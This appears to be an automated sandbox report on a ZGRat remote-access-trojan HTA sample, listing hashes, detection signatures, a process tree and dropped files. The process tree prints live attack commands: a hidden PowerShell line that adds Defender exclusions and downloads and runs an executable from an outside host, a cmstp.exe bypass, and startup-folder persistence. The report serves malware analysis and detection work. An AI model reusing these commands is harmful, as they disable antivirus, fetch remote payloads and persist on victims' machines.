Analysis
-
max time kernel
131s -
max time network
136s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
-
submitted
14-05-2024 01:10
General
-
Target
355851dbcd13c36aa58da3c34213e30e15b2a299f6fbe7611b07b07679041ac4.hta
-
Size
9KB
-
MD5
344020eda12e49be499998ace856ed47
-
SHA1
f0a7431a73e7cb0be73fbc588bd91cf173f672d3
-
SHA256
355851dbcd13c36aa58da3c34213e30e15b2a299f6fbe7611b07b07679041ac4
-
SHA512
c3a949de4b8d79b84be37d4b4695a7ccde2b2da583ef998442cb0d9a7191756bcf3d67cf5c2da476f3590823177d07355a9151df32c10d259a32bc4f1fea3b90
-
SSDEEP
192:w1YCCf214wpenCk59zcntnonzcE6LChVg+D0SDs/:w/Cf214UenCkncntnonzcE6kVgmRs/
Malware Config
Signatures
-
Detect ZGRat V1 34 IoCs
-
ZGRat
ZGRat is remote access trojan written in C#.
-
Detects executables packed with Agile.NET / CliSecure 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Using powershell.exe command.
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 2 IoCs
-
Executes dropped EXE 4 IoCs
-
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 36 IoCs
-
Suspicious use of AdjustPrivilegeToken 9 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 43 IoCs
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\355851dbcd13c36aa58da3c34213e30e15b2a299f6fbe7611b07b07679041ac4.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -File C:\Users\Public\sWRA.ps12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmstp.exe"cmstp.exe" C:\Users\Public\config.inf /au3⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gttjsnwf\gttjsnwf.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE4A3.tmp" "c:\Users\Admin\AppData\Local\Temp\gttjsnwf\CSC767320E3ED2646A296D16AA292D88981.TMP"4⤵
-
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy UnRestricted -WindowStyle Hidden Add-MpPreference -ExclusionPath $env:PUBLIC,'C:\';Add-MpPreference -ExclusionExtension '.exe';curl.exe 'http://relay-02-static.network/rkei/Kntgugii.exe' -o ($env:PUBLIC + '\Kntgugii.exe');start ($env:PUBLIC + '\Kntgugii.exe')2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\curl.exe"C:\Windows\system32\curl.exe" http://relay-02-static.network/rkei/Kntgugii.exe -o C:\Users\Public\Kntgugii.exe3⤵
-
-
C:\Users\Public\Kntgugii.exe"C:\Users\Public\Kntgugii.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cmstp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=2856,i,2607710392823067546,4648797561512801463,262144 --variations-seed-version --mojo-platform-channel-handle=4012 /prefetch:81⤵
-
C:\Users\Admin\AppData\Local\FrameworkDisplayName\lrqzysar\TypeId.exeC:\Users\Admin\AppData\Local\FrameworkDisplayName\lrqzysar\TypeId.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\qjnxunle.exeC:\Users\Admin\AppData\Local\Temp\qjnxunle.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe"Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\Admin\AppData\Local\Temp\qjnxunle.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qjnxunle.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\qjnxunle.exe"C:\Users\Admin\AppData\Local\Temp\qjnxunle.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5e20c25c6796223e69094518c14e3d538
SHA161351cd1c57ca100ea78f52701f9ee68eb5cdf97
SHA25652117555684871e6ffb8392082b5fd7268149bf6ca1760f1b317a6ed6ab93aa2
SHA512b049eb07ad1de2c86d39ff723e51946ec14cfcb356ef1072c2a3e13c69d3a53cfd775c00b46612a6629dc9154ffb7565f495bbe640a8cc9d3f36afc27e5c4288
-
Filesize
1KB
MD50558c1421c8055b48ee469af53aa6c85
SHA15fbb01847adc3c4b3a67bd50db083357d6bc4efa
SHA2567d3800257c46946cef2203244847520f0e16db338db8032ced936e1a56f9da9c
SHA5126e8ad527620ba26bdf7786241e2c1c223aa88ddbe23445d75b44644f423c153436aacdf31394e9d10479b9f308a7dd89188695875b753e6fc71ae95ee7b79817
-
Filesize
20KB
MD58a6fcd3c515c2a8d164ed094e3042c68
SHA1285521cabe4e0fd8072a05f4da8bb6a910c57ca7
SHA256549e60c62942399f89747f4bffc8d535af9cf2017c5574755453a73f05b0e702
SHA51238969e2f544ec259b6795aa154769ac017e536b9317f88432516a102cfbf17b2f30c1eea6bd21a1cc199028890256dc80895f2a368ef70889a361bf9cdfdd085
-
Filesize
19KB
MD5bb6ba6f58b58e2b08da9371a8cf2423a
SHA19e8b71e244dec02b5f79141ce26cfffed98a6cb2
SHA2566e8dff293be08a6fd029ec7183dd57afee7e7aa66bdb5ba9d4446d422f221a91
SHA5126e56800be1499a8bab8332860ffe0a2617522c58c30693dd4b90449096ca34663775b2efbb5b4b3362e37d9334d69b34e748ab1893a13abff06bb46d00bec59b
-
Filesize
1KB
MD510b4f7d7f4bf9b75b8e96fa46b283cf8
SHA15348d24103e9ce375d607db65389b4e979bdbdf5
SHA256e7af8a0fcbb597acaa52aefc57328cad1e5fdd6d07437b98fe496bf31893bdd5
SHA5123b5178897b2ad5b7b3228226badc73ec26186a0ec685956202fc93b21527cde9c7bb57571f86a039b5ffcb9df60e4098becc84081958e57bd54ef3c46ebc0f5f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5048fa7a554eb37eb3edf226b8944275a
SHA1bfac98fbc5133d7bfb90627179dc24f1103de7aa
SHA2568befc5a312e8a2c2de04fe643f99537b1271498d022113906a71aa1094bcf5c0
SHA512358ea5f29d14ea3cc9c505eded02f9951bbe12644d9a37912d5ca48e2f6b68348ad63f193a496b674ae5936a906ae887edd1790c6bdf836fb061325076a50961
-
Filesize
26KB
MD51f90151f3470f316a645a6617534a0be
SHA180dd3641418ff22c353b2d1f0f4c86990cfdaee1
SHA256aae9e126f03798f15445e8f308bbf43e9bda6a9e1ffaa9fe2dfd75eb65fef74c
SHA5125609219d6a7ece553032589d9765e7fcf394253fa4df5d64539e231a4350bf9c8b3bfd2ec5ca1904a6584b793f3a174353261e23983f7ac428b7957379eccbcf
-
Filesize
594KB
MD5f5fe6435df7702338b1320b55f96caa4
SHA1fab2bbc6e43cc01217673b2753e223099c3c297f
SHA2563f352445c521895812735acebb5f944cd1e88024cade5b201c562166619ffc9f
SHA5124c355979435dc7519c4e4ee1a9ff6ad4be9cabcaa6b376473b039fcd785837689f16662e680b196f2b74ec689ff894175a2892206f1883e6e22ca89a292a6fab
-
Filesize
793B
MD59551f37d1c321b89594ce33dd5c4a166
SHA1dbde6afe056ffa89f57b3d817767305533ffc723
SHA2562fb41b2fc5e9a70f7f4b5c4338306b0ad7b6e9a46921c11bb99a24b3f856c99c
SHA5124fcea7fb0a6fbcbcd1e332c6f41fd0cf7cd5c0635ba798950cfc590aeff89166b5ea26f72fce98af1b7664165e3b91bcade06a072685d0f04ec22195d006f7e8
-
Filesize
980B
MD5cdf55a34ebd80623d6ec05b2f0a42c19
SHA19a226bd3e721bc082529a74bd7be39787d427538
SHA2569cf9a284d8520457baa6bbc513174c60744a9ed5662740b92052bb809c72fc6c
SHA51296e5007617cfe375fd268ed534a6726e0d77a28134e780d20bac69c9918c7662d1704a1fc3f16f517d705ecbec35913cfaf34f7067e280fa8c9302e43b5a41c1
-
Filesize
652B
MD50f9583a71d856ed9be60e255f729a163
SHA1aacdb54455be836dfbbbc1a70e0e7dd90b9c432a
SHA2566f28ae4f2a91c119d08df0cc2a8b614b0e782975ce6dfd015217c47509f7b499
SHA512365a2df0955bdeef61fee0539553b1bbdce4450cf19afc1f32cec48f48fb538cb7af9fde466f2983a9c5d2ea2513f16d5cbb748bdc3b6791823fb8635f14204c
-
Filesize
319B
MD5f3c09788c53ec7b12e03c328440a57fc
SHA1898711631c676136cc0576370c705d5bb38df060
SHA256f52036306d49ca5bc0c58242a311526e4d045dcd070b0981db503da5e3a55212
SHA512cdddd3ffe6563bcd0ff53973b3a3fe7aca3939b77dcb3fcc2e56d93c9f0727a0d5ffa550a21923ffa8a446da589d68a6c26674068bf75233421452a153b9e1ce
-
Filesize
369B
MD5c66457d454b06b42555e161e11c4a68b
SHA1c74efed01b8a9dee04678540ae6efc8329a0277b
SHA256b209a30374484fb3fb5b4f21facb78065a6a2d2c0f2156b87581ce8f404ccf63
SHA512f1539f00aaaedf0de9ec85b851db0c0c2c40a763795bd1ab1e9656f95dd6d4701a67a5155e1a4358ad901e070221f5237f3a809b629623b720cbede0d9a4b276
-
Filesize
904KB
-
Filesize
904KB
-
Filesize
336KB
-
Filesize
304KB
-
Filesize
344KB
-
Filesize
904KB
-
Filesize
904KB
-
Filesize
904KB
-
Filesize
904KB
-
Filesize
904KB
-
Filesize
904KB
-
Filesize
904KB
-
Filesize
904KB
-
Filesize
904KB
-
Filesize
904KB
-
Filesize
904KB
-
Filesize
904KB
-
Filesize
904KB
-
Filesize
904KB
-
Filesize
904KB
-
Filesize
904KB
-
Filesize
904KB
-
Filesize
904KB
-
Filesize
904KB
-
Filesize
904KB
-
Filesize
904KB
-
Filesize
904KB
-
Filesize
904KB
-
Filesize
904KB
-
Filesize
616KB
-
Filesize
928KB
-
Filesize
904KB
-
Filesize
904KB
-
Filesize
904KB
-
Filesize
904KB
-
Filesize
904KB
-
Filesize
904KB
-
Filesize
904KB
-
Filesize
344KB
-
Filesize
792KB
-
Filesize
672KB
-
Filesize
48KB
-
Filesize
624KB
-
Filesize
120KB
-
Filesize
848KB
-
Filesize
472KB
-
Filesize
104KB
-
Filesize
6.5MB
-
Filesize
7.7MB
-
Filesize
216KB
-
Filesize
7.7MB
-
Filesize
136KB
-
Filesize
6.2MB
-
Filesize
408KB
-
Filesize
7.7MB
-
Filesize
40KB
-
Filesize
584KB
-
Filesize
408KB
-
Filesize
4KB
-
Filesize
3.3MB
-
Filesize
32KB
-
Filesize
120KB
-
Filesize
304KB
-
Filesize
5.6MB
-
Filesize
136KB
-
Filesize
600KB
-
Filesize
80KB
-
Filesize
200KB
-
Filesize
652KB
-
Filesize
40KB
-
Filesize
68KB
-
Filesize
56KB
-
Filesize
3.3MB
-
Filesize
120KB
-
Filesize
304KB
-
Filesize
32KB
-
Filesize
304KB
-
Filesize
104KB
-
Filesize
304KB
-
Filesize
3.3MB